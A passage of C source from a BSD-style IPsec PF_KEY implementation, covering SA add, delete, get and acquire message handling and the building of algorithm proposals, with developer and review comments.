		ipseclog((LOG_DEBUG, "key_add: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa) ||
	    mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) ||
	    mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) {
		/* XXX need more */
		ipseclog((LOG_DEBUG, "key_add: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	/* SA2 extension (mode/reqid) is optional; default to "any". */
	if (mhp->ext[SADB_X_EXT_SA2] != NULL) {
		mode = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_mode;
		reqid = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_reqid;
	} else {
		mode = IPSEC_MODE_ANY;
		reqid = 0;
	}

	sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA];
	src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC];
	dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST];

	/* XXX boundary check against sa_len */
	/* src0+1 / dst0+1: the sockaddr immediately follows the header. */
	KEY_SETSECASIDX(proto, mode, reqid, src0 + 1, dst0 + 1, &saidx);

	/* get a SA header; create one if this is the first SA for saidx */
	if ((newsah = key_getsah(&saidx)) == NULL) {
		/* create a new SA header */
		if ((newsah = key_newsah(&saidx)) == NULL) {
			ipseclog((LOG_DEBUG, "key_add: No more memory.\n"));
			return key_senderror(so, m, ENOBUFS);
		}
	}

	/* set spidx if there */
	/* XXX rewrite */
	error = key_setident(newsah, m, mhp);
	if (error) {
		return key_senderror(so, m, error);
	}

	/* create new SA entry. */
	/* We can create new SA only if SPI is different. */
	if (key_getsavbyspi(newsah, sa0->sadb_sa_spi)) {
		ipseclog((LOG_DEBUG, "key_add: SA already exists.\n"));
		return key_senderror(so, m, EEXIST);
	}
	newsav = KEY_NEWSAV(m, mhp, newsah, &error);
	if (newsav == NULL) {
		return key_senderror(so, m, error);
	}

	/* check SA values to be mature. */
	if ((error = key_mature(newsav)) != 0) {
		KEY_FREESAV(&newsav);
		return key_senderror(so, m, error);
	}

	/*
	 * don't call key_freesav() here, as we would like to keep the SA
	 * in the database on success.
	 */

    {
	struct mbuf *n;

	/* set msg buf from mhp */
	/* NOTE(review): log message says "key_update" — copy/paste remnant. */
	n = key_getmsgbuf_x1(m, mhp);
	if (n == NULL) {
		ipseclog((LOG_DEBUG, "key_update: No more memory.\n"));
		return key_senderror(so, m, ENOBUFS);
	}

	m_freem(m);
	return key_sendup_mbuf(so, n, KEY_SENDUP_ALL);
    }
}

/* m is retained */
/*
 * Copy the (optional) source/destination identity extensions out of the
 * message and attach them to the SA header.  Returns 0 or an errno.
 */
static int
key_setident(struct secashead *sah, struct mbuf *m,
	     const struct sadb_msghdr *mhp)
{
	const struct sadb_ident *idsrc, *iddst;
	int idsrclen, iddstlen;

	/* sanity check */
	if (sah == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_setident: NULL pointer is passed.\n");

	/* don't make buffer if not there */
	if (mhp->ext[SADB_EXT_IDENTITY_SRC] == NULL &&
	    mhp->ext[SADB_EXT_IDENTITY_DST] == NULL) {
		sah->idents = NULL;
		sah->identd = NULL;
		return 0;
	}

	/* identities must come in pairs */
	if (mhp->ext[SADB_EXT_IDENTITY_SRC] == NULL ||
	    mhp->ext[SADB_EXT_IDENTITY_DST] == NULL) {
		ipseclog((LOG_DEBUG, "key_setident: invalid identity.\n"));
		return EINVAL;
	}

	idsrc = (const struct sadb_ident *)mhp->ext[SADB_EXT_IDENTITY_SRC];
	iddst = (const struct sadb_ident *)mhp->ext[SADB_EXT_IDENTITY_DST];
	idsrclen = mhp->extlen[SADB_EXT_IDENTITY_SRC];
	iddstlen = mhp->extlen[SADB_EXT_IDENTITY_DST];

	/* validity check */
	if (idsrc->sadb_ident_type != iddst->sadb_ident_type) {
		ipseclog((LOG_DEBUG, "key_setident: ident type mismatch.\n"));
		return EINVAL;
	}

	/*
	 * NOTE(review): every case (including default) returns 0 here, so
	 * the copy code below is currently unreachable dead code — kept
	 * as-is; it documents the intended behavior once the switch is
	 * filled in.
	 */
	switch (idsrc->sadb_ident_type) {
	case SADB_IDENTTYPE_PREFIX:
	case SADB_IDENTTYPE_FQDN:
	case SADB_IDENTTYPE_USERFQDN:
	default:
		/* XXX do nothing */
		sah->idents = NULL;
		sah->identd = NULL;
		return 0;
	}

	/* make structure */
	KMALLOC(sah->idents, struct sadb_ident *, idsrclen);
	if (sah->idents == NULL) {
		ipseclog((LOG_DEBUG, "key_setident: No more memory.\n"));
		return ENOBUFS;
	}
	KMALLOC(sah->identd, struct sadb_ident *, iddstlen);
	if (sah->identd == NULL) {
		KFREE(sah->idents);
		sah->idents = NULL;
		ipseclog((LOG_DEBUG, "key_setident: No more memory.\n"));
		return ENOBUFS;
	}
	bcopy(idsrc, sah->idents, idsrclen);
	bcopy(iddst, sah->identd, iddstlen);

	return 0;
}

/*
 * m will not be freed on return.
 * it is caller's responsibility to free the result.
 */
static struct mbuf *
key_getmsgbuf_x1(struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct mbuf *n;

	/* sanity check */
	if (m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_getmsgbuf_x1: NULL pointer is passed.\n");

	/* create new sadb_msg to reply.
*/
	/* echo back the relevant extensions of the request (9 of them) */
	n = key_gather_mbuf(m, mhp, 1, 9, SADB_EXT_RESERVED,
	    SADB_EXT_SA, SADB_X_EXT_SA2,
	    SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST,
	    SADB_EXT_LIFETIME_HARD, SADB_EXT_LIFETIME_SOFT,
	    SADB_EXT_IDENTITY_SRC, SADB_EXT_IDENTITY_DST);
	if (!n)
		return NULL;

	if (n->m_len < sizeof(struct sadb_msg)) {
		n = m_pullup(n, sizeof(struct sadb_msg));
		if (n == NULL)
			return NULL;
	}
	mtod(n, struct sadb_msg *)->sadb_msg_errno = 0;
	mtod(n, struct sadb_msg *)->sadb_msg_len =
	    PFKEY_UNIT64(n->m_pkthdr.len);

	return n;
}

static int key_delete_all (struct socket *, struct mbuf *,
			   const struct sadb_msghdr *, u_int16_t);

/*
 * SADB_DELETE processing
 * receive
 *   <base, SA(*), address(SD)>
 * from the ikmpd, and set SADB_SASTATE_DEAD,
 * and send,
 *   <base, SA(*), address(SD)>
 * to the ikmpd.
 *
 * m will always be freed.
 */
static int
key_delete(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct sadb_sa *sa0;
	struct sadb_address *src0, *dst0;
	struct secasindex saidx;
	struct secashead *sah;
	struct secasvar *sav = NULL;
	u_int16_t proto;

	/* sanity check */
	if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_delete: NULL pointer is passed.\n");

	/* map satype to proto */
	if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) {
		ipseclog((LOG_DEBUG, "key_delete: invalid satype is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_DST] == NULL) {
		ipseclog((LOG_DEBUG, "key_delete: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) ||
	    mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) {
		ipseclog((LOG_DEBUG, "key_delete: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	if (mhp->ext[SADB_EXT_SA] == NULL) {
		/*
		 * Caller wants us to delete all non-LARVAL SAs
		 * that match the src/dst.  This is used during
		 * IKE INITIAL-CONTACT.
		 */
		ipseclog((LOG_DEBUG, "key_delete: doing delete all.\n"));
		return key_delete_all(so, m, mhp, proto);
	} else if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa)) {
		ipseclog((LOG_DEBUG, "key_delete: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA];
	src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]);
	dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]);

	/* XXX boundary check against sa_len */
	KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx);

	/* get a SA header */
	LIST_FOREACH(sah, &sahtree, chain) {
		if (sah->state == SADB_SASTATE_DEAD)
			continue;
		if (key_cmpsaidx(&sah->saidx, &saidx, CMP_HEAD) == 0)
			continue;

		/* get a SA with SPI. */
		sav = key_getsavbyspi(sah, sa0->sadb_sa_spi);
		if (sav)
			break;
	}
	/* sah != NULL here implies sav != NULL (loop only breaks on a hit) */
	if (sah == NULL) {
		ipseclog((LOG_DEBUG, "key_delete: no SA found.\n"));
		return key_senderror(so, m, ENOENT);
	}

	key_sa_chgstate(sav, SADB_SASTATE_DEAD);
	KEY_FREESAV(&sav);

    {
	struct mbuf *n;
	struct sadb_msg *newmsg;

	/* create new sadb_msg to reply. */
	n = key_gather_mbuf(m, mhp, 1, 4, SADB_EXT_RESERVED,
	    SADB_EXT_SA, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST);
	if (!n)
		return key_senderror(so, m, ENOBUFS);

	if (n->m_len < sizeof(struct sadb_msg)) {
		n = m_pullup(n, sizeof(struct sadb_msg));
		if (n == NULL)
			return key_senderror(so, m, ENOBUFS);
	}
	newmsg = mtod(n, struct sadb_msg *);
	newmsg->sadb_msg_errno = 0;
	newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len);

	m_freem(m);
	return key_sendup_mbuf(so, n, KEY_SENDUP_ALL);
    }
}

/*
 * delete all SAs for src/dst.  Called from key_delete().
*/
static int
key_delete_all(struct socket *so, struct mbuf *m,
	       const struct sadb_msghdr *mhp, u_int16_t proto)
{
	struct sadb_address *src0, *dst0;
	struct secasindex saidx;
	struct secashead *sah;
	struct secasvar *sav, *nextsav;
	u_int stateidx, state;
	struct mbuf *n;
	struct sadb_msg *newmsg;

	src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]);
	dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]);

	/* XXX boundary check against sa_len */
	KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx);

	LIST_FOREACH(sah, &sahtree, chain) {
		if (sah->state == SADB_SASTATE_DEAD)
			continue;
		if (key_cmpsaidx(&sah->saidx, &saidx, CMP_HEAD) == 0)
			continue;

		/* Delete all non-LARVAL SAs. */
		for (stateidx = 0;
		     stateidx < NELEM(saorder_state_alive);
		     stateidx++) {
			state = saorder_state_alive[stateidx];
			if (state == SADB_SASTATE_LARVAL)
				continue;
			/* MUTABLE variant: KEY_FREESAV may unlink sav */
			LIST_FOREACH_MUTABLE(sav, &sah->savtree[state],
			    chain, nextsav) {
				/* sanity check */
				if (sav->state != state) {
					ipseclog((LOG_DEBUG,
					    "key_delete_all: "
					    "invalid sav->state "
					    "(queue: %d SA: %d)\n",
					    state, sav->state));
					continue;
				}

				key_sa_chgstate(sav, SADB_SASTATE_DEAD);
				KEY_FREESAV(&sav);
			}
		}
	}

	/* create new sadb_msg to reply. */
	n = key_gather_mbuf(m, mhp, 1, 3, SADB_EXT_RESERVED,
	    SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST);
	if (!n)
		return key_senderror(so, m, ENOBUFS);

	if (n->m_len < sizeof(struct sadb_msg)) {
		n = m_pullup(n, sizeof(struct sadb_msg));
		if (n == NULL)
			return key_senderror(so, m, ENOBUFS);
	}
	newmsg = mtod(n, struct sadb_msg *);
	newmsg->sadb_msg_errno = 0;
	newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len);

	m_freem(m);
	return key_sendup_mbuf(so, n, KEY_SENDUP_ALL);
}

/*
 * SADB_GET processing
 * receive
 *   <base, SA(*), address(SD)>
 * from the ikmpd, and get a SP and a SA to respond,
 * and send,
 *   <base, SA, (lifetime(HSC),) address(SD), (address(P),) key(AE),
 *   (identity(SD),) (sensitivity)>
 * to the ikmpd.
 *
 * m will always be freed.
 */
static int
key_get(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct sadb_sa *sa0;
	struct sadb_address *src0, *dst0;
	struct secasindex saidx;
	struct secashead *sah;
	struct secasvar *sav = NULL;
	u_int16_t proto;

	/* sanity check */
	if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_get: NULL pointer is passed.\n");

	/* map satype to proto */
	if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) {
		ipseclog((LOG_DEBUG, "key_get: invalid satype is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	if (mhp->ext[SADB_EXT_SA] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_DST] == NULL) {
		ipseclog((LOG_DEBUG, "key_get: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa) ||
	    mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) ||
	    mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) {
		ipseclog((LOG_DEBUG, "key_get: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA];
	src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC];
	dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST];

	/* XXX boundary check against sa_len */
	KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx);

	/* get a SA header */
	LIST_FOREACH(sah, &sahtree, chain) {
		if (sah->state == SADB_SASTATE_DEAD)
			continue;
		if (key_cmpsaidx(&sah->saidx, &saidx, CMP_HEAD) == 0)
			continue;

		/* get a SA with SPI. */
		sav = key_getsavbyspi(sah, sa0->sadb_sa_spi);
		if (sav)
			break;
	}
	if (sah == NULL) {
		ipseclog((LOG_DEBUG, "key_get: no SA found.\n"));
		return key_senderror(so, m, ENOENT);
	}

    {
	struct mbuf *n;
	u_int8_t satype;

	/* map proto to satype */
	if ((satype = key_proto2satype(sah->saidx.proto)) == 0) {
		ipseclog((LOG_DEBUG, "key_get: there was invalid proto in SAD.\n"));
		return key_senderror(so, m, EINVAL);
	}

	/* create new sadb_msg to reply.
*/ n = key_setdumpsa(sav, SADB_GET, satype, mhp->msg->sadb_msg_seq, mhp->msg->sadb_msg_pid); if (!n) return key_senderror(so, m, ENOBUFS); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } } /* XXX make it sysctl-configurable? */ static void key_getcomb_setlifetime(struct sadb_comb *comb) { comb->sadb_comb_soft_allocations = 1; comb->sadb_comb_hard_allocations = 1; comb->sadb_comb_soft_bytes = 0; comb->sadb_comb_hard_bytes = 0; comb->sadb_comb_hard_addtime = 86400; /* 1 day */ comb->sadb_comb_soft_addtime = comb->sadb_comb_soft_addtime * 80 / 100; comb->sadb_comb_soft_usetime = 28800; /* 8 hours */ comb->sadb_comb_hard_usetime = comb->sadb_comb_hard_usetime * 80 / 100; } /* * XXX reorder combinations by preference * XXX no idea if the user wants ESP authentication or not */ static struct mbuf * key_getcomb_esp(void) { struct sadb_comb *comb; struct enc_xform *algo; struct mbuf *result = NULL, *m, *n; int encmin; int i, off, o; int totlen; const int l = PFKEY_ALIGN8(sizeof(struct sadb_comb)); m = NULL; for (i = 1; i <= SADB_EALG_MAX; i++) { algo = esp_algorithm_lookup(i); if (algo == NULL) continue; /* discard algorithms with key size smaller than system min */ if (_BITS(algo->maxkey) < ipsec_esp_keymin) continue; if (_BITS(algo->minkey) < ipsec_esp_keymin) encmin = ipsec_esp_keymin; else encmin = _BITS(algo->minkey); if (ipsec_esp_auth) m = key_getcomb_ah(); else { KASSERT(l <= MLEN, ("key_getcomb_esp: l=%u > MLEN=%lu", l, (u_long) MLEN)); MGET(m, MB_DONTWAIT, MT_DATA); if (m) { M_ALIGN(m, l); m->m_len = l; m->m_next = NULL; bzero(mtod(m, caddr_t), m->m_len); } } if (!m) goto fail; totlen = m_lengthm(m, NULL); KASSERT((totlen % l) == 0, ("key_getcomb_esp: totlen=%u, l=%u", totlen, l)); for (off = 0; off < totlen; off += l) { n = m_pulldown(m, off, l, &o); if (!n) { /* m is already freed */ goto fail; } comb = (struct sadb_comb *)(mtod(n, caddr_t) + o); bzero(comb, sizeof(*comb)); key_getcomb_setlifetime(comb); comb->sadb_comb_encrypt = i; 
comb->sadb_comb_encrypt_minbits = encmin;
			comb->sadb_comb_encrypt_maxbits = _BITS(algo->maxkey);
		}

		/* accumulate this algorithm's combinations onto the result */
		if (!result)
			result = m;
		else
			m_cat(result, m);
	}

	return result;

 fail:
	if (result)
		m_freem(result);
	return NULL;
}

/*
 * Report the usable key-size range for an AH algorithm.  When the
 * transform accepts arbitrary key sizes (keysize == 0) the algorithm
 * itself still restricts the range, enforced here.
 */
static void
key_getsizes_ah(
	const struct auth_hash *ah,
	int alg,
	u_int16_t* min,
	u_int16_t* max)
{
	*min = *max = ah->keysize;
	if (ah->keysize == 0) {
		/*
		 * Transform takes arbitrary key size but algorithm
		 * key size is restricted.  Enforce this here.
		 */
		switch (alg) {
		case SADB_X_AALG_MD5:
			*min = *max = 16;
			break;
		case SADB_X_AALG_SHA:
			*min = *max = 20;
			break;
		case SADB_X_AALG_NULL:
			*min = 1;
			*max = 256;
			break;
		default:
			DPRINTF(("key_getsizes_ah: unknown AH algorithm %u\n",
				alg));
			break;
		}
	}
}

/*
 * XXX reorder combinations by preference
 */
static struct mbuf *
key_getcomb_ah(void)
{
	struct sadb_comb *comb;
	struct auth_hash *algo;
	struct mbuf *m;
	u_int16_t minkeysize, maxkeysize;
	int i;
	const int l = PFKEY_ALIGN8(sizeof(struct sadb_comb));

	m = NULL;
	for (i = 1; i <= SADB_AALG_MAX; i++) {
#if 1
		/* we prefer HMAC algorithms, not old algorithms */
		if (i != SADB_AALG_SHA1HMAC && i != SADB_AALG_MD5HMAC)
			continue;
#endif
		algo = ah_algorithm_lookup(i);
		if (!algo)
			continue;
		key_getsizes_ah(algo, i, &minkeysize, &maxkeysize);
		/* discard algorithms with key size smaller than system min */
		if (_BITS(minkeysize) < ipsec_ah_keymin)
			continue;

		/* first entry uses a fresh mbuf; later ones are prepended */
		if (!m) {
			KASSERT(l <= MLEN,
				("key_getcomb_ah: l=%u > MLEN=%lu",
				l, (u_long) MLEN));
			MGET(m, MB_DONTWAIT, MT_DATA);
			if (m) {
				M_ALIGN(m, l);
				m->m_len = l;
				m->m_next = NULL;
			}
		} else
			M_PREPEND(m, l, MB_DONTWAIT);
		if (!m)
			return NULL;

		comb = mtod(m, struct sadb_comb *);
		bzero(comb, sizeof(*comb));
		key_getcomb_setlifetime(comb);
		comb->sadb_comb_auth = i;
		comb->sadb_comb_auth_minbits = _BITS(minkeysize);
		comb->sadb_comb_auth_maxbits = _BITS(maxkeysize);
	}

	return m;
}

/*
 * not really an official behavior.  discussed in pf_key@inner.net in Sep2000.
* XXX reorder combinations by preference
 */
static struct mbuf *
key_getcomb_ipcomp(void)
{
	struct sadb_comb *comb;
	struct comp_algo *algo;
	struct mbuf *m;
	int i;
	const int l = PFKEY_ALIGN8(sizeof(struct sadb_comb));

	m = NULL;
	for (i = 1; i <= SADB_X_CALG_MAX; i++) {
		algo = ipcomp_algorithm_lookup(i);
		if (!algo)
			continue;

		/* first entry uses a fresh mbuf; later ones are prepended */
		if (!m) {
			KASSERT(l <= MLEN,
				("key_getcomb_ipcomp: l=%u > MLEN=%lu",
				l, (u_long) MLEN));
			MGET(m, MB_DONTWAIT, MT_DATA);
			if (m) {
				M_ALIGN(m, l);
				m->m_len = l;
				m->m_next = NULL;
			}
		} else
			M_PREPEND(m, l, MB_DONTWAIT);
		if (!m)
			return NULL;

		comb = mtod(m, struct sadb_comb *);
		bzero(comb, sizeof(*comb));
		key_getcomb_setlifetime(comb);
		comb->sadb_comb_encrypt = i;
		/* what should we set into sadb_comb_*_{min,max}bits? */
	}

	return m;
}

/*
 * Build a SADB_EXT_PROPOSAL extension for the given SA index by
 * prepending a sadb_prop header to the per-protocol combination list.
 *
 * XXX no way to pass mode (transport/tunnel) to userland
 * XXX replay checking?
 * XXX sysctl interface to ipsec_{ah,esp}_keymin
 */
static struct mbuf *
key_getprop(const struct secasindex *saidx)
{
	struct sadb_prop *prop;
	struct mbuf *m;
	const int l = PFKEY_ALIGN8(sizeof(struct sadb_prop));

	switch (saidx->proto) {
	case IPPROTO_ESP:
		m = key_getcomb_esp();
		break;
	case IPPROTO_AH:
		m = key_getcomb_ah();
		break;
	case IPPROTO_IPCOMP:
		m = key_getcomb_ipcomp();
		break;
	default:
		return NULL;
	}

	if (!m)
		return NULL;
	M_PREPEND(m, l, MB_DONTWAIT);
	if (!m)
		return NULL;

	prop = mtod(m, struct sadb_prop *);
	bzero(prop, sizeof(*prop));
	prop->sadb_prop_len = PFKEY_UNIT64(m_lengthm(m, NULL));
	prop->sadb_prop_exttype = SADB_EXT_PROPOSAL;
	prop->sadb_prop_replay = 32;	/* XXX */

	return m;
}

/*
 * SADB_ACQUIRE processing called by key_checkrequest() and key_acquire2().
 * send
 *   <base, SA, address(SD), (address(P)), x_policy,
 *       (identity(SD),) (sensitivity,) proposal>
 * to KMD, and expect to receive
 *   <base> with SADB_ACQUIRE if error occurred,
 * or
 *   <base, src address, dst address, (SPI range)> with SADB_GETSPI
 * from KMD by PF_KEY.
 *
 * XXX x_policy is outside of RFC2367 (KAME extension).
 * XXX sensitivity is not supported.
* XXX for ipcomp, RFC2367 does not define how to fill in proposal.
 * see comment for key_getcomb_ipcomp().
 *
 * OUT:
 *    0     : succeed
 *    others: error number
 */
static int
key_acquire(const struct secasindex *saidx, struct secpolicy *sp)
{
	struct mbuf *result = NULL, *m;
#ifndef IPSEC_NONBLOCK_ACQUIRE
	struct secacq *newacq;
#endif
	u_int8_t satype;
	int error = -1;
	u_int32_t seq;

	/* sanity check */
	KASSERT(saidx != NULL, ("key_acquire: null saidx"));
	satype = key_proto2satype(saidx->proto);
	KASSERT(satype != 0,
		("key_acquire: null satype, protocol %u", saidx->proto));

#ifndef IPSEC_NONBLOCK_ACQUIRE
	/*
	 * We never do anything about acquiring SA.  There is another
	 * solution that kernel blocks to send SADB_ACQUIRE message until
	 * getting something message from IKEd.  In later case, to be
	 * managed with ACQUIRING list.
	 */
	/* Get an entry to check whether sending message or not. */
	/* rate-limit: re-send only after key_blockacq_count suppressions */
	if ((newacq = key_getacq(saidx)) != NULL) {
		if (key_blockacq_count < newacq->count) {
			/* reset counter and do send message. */
			newacq->count = 0;
		} else {
			/* increment counter and do nothing. */
			newacq->count++;
			return 0;
		}
	} else {
		/* make new entry for blocking to send SADB_ACQUIRE. */
		if ((newacq = key_newacq(saidx)) == NULL)
			return ENOBUFS;

		/* add to acqtree */
		LIST_INSERT_HEAD(&acqtree, newacq, chain);
	}
#endif

#ifndef IPSEC_NONBLOCK_ACQUIRE
	seq = newacq->seq;
#else
	seq = (acq_seq = (acq_seq == ~0 ? 1 : ++acq_seq));
#endif
	m = key_setsadbmsg(SADB_ACQUIRE, 0, satype, seq, 0, 0);
	if (!m) {
		error = ENOBUFS;
		goto fail;
	}
	result = m;

	/* set sadb_address for saidx's.
	 */
	m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC,
	    &saidx->src.sa, FULLMASK, IPSEC_ULPROTO_ANY);
	if (!m) {
		error = ENOBUFS;
		goto fail;
	}
	m_cat(result, m);

	m = key_setsadbaddr(SADB_EXT_ADDRESS_DST,
	    &saidx->dst.sa, FULLMASK, IPSEC_ULPROTO_ANY);
	if (!m) {
		error = ENOBUFS;
		goto fail;
	}
	m_cat(result, m);

	/* XXX proxy address (optional) */

	/* set sadb_x_policy */
	if (sp) {
		m = key_setsadbxpolicy(sp->policy, sp->spidx.dir, sp->id);
		if (!m) {
			error = ENOBUFS;
			goto fail;
		}
		m_cat(result, m);
	}

	/* XXX identity (optional) */
#if 0
	if (idexttype && fqdn) {
		/* create identity extension (FQDN) */
		struct sadb_ident *id;
		int fqdnlen;

		fqdnlen = strlen(fqdn) + 1;	/* +1 for terminating-NUL */
		id = (struct sadb_ident *)p;
		bzero(id, sizeof(*id) + PFKEY_ALIGN8(fqdnlen));
		id->sadb_ident_len = PFKEY_UNIT64(sizeof(*id) + PFKEY_ALIGN8(fqdnlen));
		id->sadb_ident_exttype = idexttype;
		id->sadb_ident_type = SADB_IDENTTYPE_FQDN;
		bcopy(fqdn, id + 1, fqdnlen);
		p += sizeof(struct sadb_ident) + PFKEY_ALIGN8(fqdnlen);
	}

	if (idexttype) {
		/* create identity extension (USERFQDN) */
		struct sadb_ident *id;
		int userfqdnlen;

		if (userfqdn) {
			/* +1 for terminating-NUL */
			userfqdnlen = strlen(userfqdn) + 1;
		} else
			userfqdnlen = 0;
		id = (struct sadb_ident *)p;
		bzero(id, sizeof(*id) + PFKEY_ALIGN8(userfqdnlen));
		id->sadb_ident_len = PFKEY_UNIT64(sizeof(*id) + PFKEY_ALIGN8(userfqdnlen));
		id->sadb_ident_exttype = idexttype;
		id->sadb_ident_type = SADB_IDENTTYPE_USERFQDN;
		/* XXX is it correct? */
		if (curproc && curproc->p_cred)
			id->sadb_ident_id = curproc->p_cred->p_ruid;
		if (userfqdn && userfqdnlen)
			bcopy(userfqdn, id + 1, userfqdnlen);
		p += sizeof(struct sadb_ident) + PFKEY_ALIGN8(userfqdnlen);
	}
#endif

	/* XXX sensitivity (optional) */

	/* create proposal/combination extension */
	m = key_getprop(saidx);
#if 0
	/*
	 * spec conformant: always attach proposal/combination extension,
	 * the problem is that we have no way to attach it for ipcomp,
	 * due to the way sadb_comb is declared in RFC2367.
	 */
	if (!m) {
		error = ENOBUFS;
		goto fail;
	}
	m_cat(result, m);
#else
	/*
	 * outside of spec; make proposal/combination extension optional.
	 */
	if (m)
		m_cat(result, m);
#endif

	if ((result->m_flags & M_PKTHDR) == 0) {
		error = EINVAL;
		goto fail;
	}

	if (result->m_len < sizeof(struct sadb_msg)) {
		result = m_pullup(result, sizeof(struct sadb_msg));
		if (result == NULL) {
			error = ENOBUFS;
			goto fail;
		}
	}

	result->m_pkthdr.len = m_lengthm(result, NULL);

	mtod(result, struct sadb_msg *)->sadb_msg_len =
	    PFKEY_UNIT64(result->m_pkthdr.len);

	return key_sendup_mbuf(NULL, result, KEY_SENDUP_REGISTERED);

 fail:
	if (result)
		m_freem(result);
	return error;
}

#ifndef IPSEC_NONBLOCK_ACQUIRE
/*
 * Allocate and initialize a new ACQUIRE-blocking entry for saidx;
 * assigns the next global acquire sequence number.
 */
static struct secacq *
key_newacq(const struct secasindex *saidx)
{
	struct secacq *newacq;

	/* get new entry */
	KMALLOC(newacq, struct secacq *, sizeof(struct secacq));
	if (newacq == NULL) {
		ipseclog((LOG_DEBUG, "key_newacq: No more memory.\n"));
		return NULL;
	}
	bzero(newacq, sizeof(*newacq));

	/* copy secindex */
	bcopy(saidx, &newacq->saidx, sizeof(newacq->saidx));
	newacq->seq = (acq_seq == ~0 ?
1 : ++acq_seq);	/* sequence numbers wrap to 1, never 0 */
	newacq->created = time_second;
	newacq->count = 0;

	return newacq;
}

/* Find the pending acquire entry whose SA index matches exactly. */
static struct secacq *
key_getacq(const struct secasindex *saidx)
{
	struct secacq *acq;

	LIST_FOREACH(acq, &acqtree, chain) {
		if (key_cmpsaidx(saidx, &acq->saidx, CMP_EXACTLY))
			return acq;
	}

	return NULL;
}

/* Find the pending acquire entry with the given sequence number. */
static struct secacq *
key_getacqbyseq(u_int32_t seq)
{
	struct secacq *acq;

	LIST_FOREACH(acq, &acqtree, chain) {
		if (acq->seq == seq)
			return acq;
	}

	return NULL;
}
#endif

/* Allocate and initialize a new SP-acquire entry for spidx. */
static struct secspacq *
key_newspacq(struct secpolicyindex *spidx)
{
	struct secspacq *acq;

	/* get new entry */
	KMALLOC(acq, struct secspacq *, sizeof(struct secspacq));
	if (acq == NULL) {
		ipseclog((LOG_DEBUG, "key_newspacq: No more memory.\n"));
		return NULL;
	}
	bzero(acq, sizeof(*acq));

	/* copy secindex */
	bcopy(spidx, &acq->spidx, sizeof(acq->spidx));
	acq->created = time_second;
	acq->count = 0;

	return acq;
}

/* Find the pending SP-acquire entry whose policy index matches exactly. */
static struct secspacq *
key_getspacq(struct secpolicyindex *spidx)
{
	struct secspacq *acq;

	LIST_FOREACH(acq, &spacqtree, chain) {
		if (key_cmpspidx_exactly(spidx, &acq->spidx))
			return acq;
	}

	return NULL;
}

/*
 * SADB_ACQUIRE processing,
 * in first situation, is receiving
 *   <base>
 * from the ikmpd, and clear sequence of its secasvar entry.
 *
 * In second situation, is receiving
 *   <base, address(SD), (address(P),) (identity(SD),) (sensitivity,) proposal>
 * from a user land process, and return
 *   <base, address(SD), (address(P),) (identity(SD),) (sensitivity,) proposal>
 * to the socket.
 *
 * m will always be freed.
 */
static int
key_acquire2(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	const struct sadb_address *src0, *dst0;
	struct secasindex saidx;
	struct secashead *sah;
